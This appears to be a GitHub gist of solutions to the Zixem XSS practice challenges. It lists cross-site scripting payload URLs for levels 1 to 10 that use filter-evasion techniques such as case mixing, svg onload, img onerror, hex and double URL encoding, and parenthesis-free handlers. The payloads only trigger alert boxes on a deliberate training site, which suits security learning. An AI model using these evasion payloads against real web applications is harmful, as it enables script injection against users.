hunter0x8/.rst

Forked from cb-v4s/.rst

Created July 13, 2021 14:20

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/hunter0x8/57ce87d29e88aa81bb10c86230c31d79.js"></script>
Save hunter0x8/57ce87d29e88aa81bb10c86230c31d79 to your computer and use it in GitHub Desktop.

Download ZIP

Zixem XSS Challenges

Raw

.rst

XSS Challenges from zixem.altervista.org

Level 1

http://www.zixem.altervista.org/XSS/1.php?name=<script>alert(1337)</script>

Level 2

http://www.zixem.altervista.org/XSS/2.php?name=<ScRIpt>alert(1337)</SCript>

Level 3

Escaping %0A (n)

http://zixem.altervista.org/XSS/3.php?name=%0a<svg/onload="alert(1337)">

Level 4

` <img src='htp.pngd'onerror=alert(1337) ' /> ` http://zixem.altervista.org/XSS/4.php?img=htp.pngd'onerror=alert(1337)%20

Level 5

` <form action="javascript:alert(1337)" method='get'> ` http://zixem.altervista.org/XSS/5.php?name=x&action=javascript:alert(1337)

Level 6

Hex Encoding

`node new Buffer.from('<').toString('hex') `

http://zixem.altervista.org/XSS/6.php?name=zxmx3csvg/onload=alert(1337)x3e

Level 7

Double URL Encoding (<>)

`node encodeURIComponent(encodeURIComponent('<>')) `

http://zixem.altervista.org/XSS/7.php?name=zxm%253csvg/onload=alert(1337)%253e

Level 8

Level 9

http://zixem.altervista.org/XSS/9.php?name=zxm<SVg/onload=confirm(1337)>

Level 10

Filtered (

http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=alert;throw 1337;//
http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=confirm`1337`;//

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment